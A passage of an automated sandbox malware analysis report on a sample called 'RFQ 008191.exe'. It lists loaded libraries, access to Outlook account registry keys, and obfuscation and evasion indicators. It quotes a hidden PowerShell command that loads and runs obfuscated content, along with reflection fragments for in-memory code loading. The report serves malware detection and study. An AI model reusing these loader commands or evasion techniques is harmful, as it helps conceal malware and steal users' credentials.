              Source: C:\Users\user\Desktop\RFQ 008191.exe | Section loaded: wintypes.dll
              Source: C:\Users\user\Desktop\RFQ 008191.exe | Section loaded: textshaping.dll
              Source: C:\Users\user\Desktop\RFQ 008191.exe | Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kdscli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Section loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Section loaded: iertutil.dll
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Section loaded: sspicli.dll
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Section loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Section loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Section loaded: profapi.dll
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Section loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Section loaded: winhttp.dll
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Section loaded: mswsock.dll
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Section loaded: iphlpapi.dll
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Section loaded: winnsi.dll
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Section loaded: urlmon.dll
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Section loaded: srvcli.dll
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Section loaded: netutils.dll
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Section loaded: winmm.dll
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Section loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Section loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Section loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Section loaded: dnsapi.dll
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Section loaded: rasadhlp.dll
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Section loaded: fwpuclnt.dll
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Section loaded: version.dll
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Section loaded: pstorec.dll
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Section loaded: vaultcli.dll
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Section loaded: wintypes.dll
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Section loaded: dpapi.dll
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Section loaded: msasn1.dll
              Source: C:\Users\user\Desktop\RFQ 008191.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
              Source: Window Recorder | Window detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
              Source: RFQ 008191.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000006.00000002.1770161341.000000000824C000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Unpacked PE file: 13.2.Juryen.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Unpacked PE file: 14.2.Juryen.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Unpacked PE file: 15.2.Juryen.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
              Source: Yara match | File source: 00000006.00000002.1771671696.0000000009BD8000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Clapnest $Snoot $Sarkastisk), (Forstands @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Seneskedebetndelse = [AppDomain]::CurrentDomain.GetAssemblies()$gl
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Cirklers)), $Ophavsretsbeskyttedes).DefineDynamicModule($Mynpacht, $false).DefineType($Superrefine, $Vaccinifer, [System.MulticastDele
              Source: C:\Users\user\Desktop\RFQ 008191.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Prmierer=gc -raw 'C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\svuppende\Beruse.Rob';$eftersgningers=$Prmierer.SubString(48853,3);.$eftersgningers($Prmierer)
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 13_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW, 13_2_004044A4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_04ABA4CA pushfd ; ret 6_2_04ABA4D9
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_04ABE9F9 push eax; mov dword ptr [esp], edx 6_2_04ABEA0C
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 11_2_1F752806 push ecx; ret 11_2_1F752819
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 13_2_0044693D push ecx; ret 13_2_0044694D
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 13_2_0044DB70 push eax; ret 13_2_0044DB84
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 13_2_0044DB70 push eax; ret 13_2_0044DBAC
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 13_2_00451D54 push eax; ret 13_2_00451D61
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 14_2_0044B090 push eax; ret 14_2_0044B0A4
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 14_2_0044B090 push eax; ret 14_2_0044B0CC
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 14_2_00451D34 push eax; ret 14_2_00451D41
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 14_2_00444E71 push ecx; ret 14_2_00444E81
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 15_2_00414060 push eax; ret 15_2_00414074
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 15_2_00414060 push eax; ret 15_2_0041409C
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 15_2_00414039 push ecx; ret 15_2_00414049
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 15_2_004164EB push 0000006Ah; retf 15_2_004165C4
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 15_2_00416553 push 0000006Ah; retf 15_2_004165C4
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 15_2_00416555 push 0000006Ah; retf 15_2_004165C4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\Juryen.exe

              Hooking and other Techniques for Hiding and Protection

              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: 14_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 14_2_004047CB
              Source: C:\Users\user\Desktop\RFQ 008191.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe API/Special instruction interceptor: Address: 24B650B
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe Code function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6046
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3527
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe Window / User API: threadDelayed 3562
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe Window / User API: threadDelayed 5949
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe Window / User API: foregroundWindowGot 1771
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe API coverage: 4.3 %
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe API coverage: 9.9 %
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7452 Thread sleep time: -7378697629483816s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe TID: 7980 Thread sleep count: 194 > 30
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe TID: 7980 Thread sleep time: -97000s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe TID: 7984 Thread sleep count: 3562 > 30
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe TID: 7984 Thread sleep time: -10686000s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe TID: 7984 Thread sleep count: 5949 > 30
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe TID: 7984 Thread sleep time: -17847000s >= -30000s
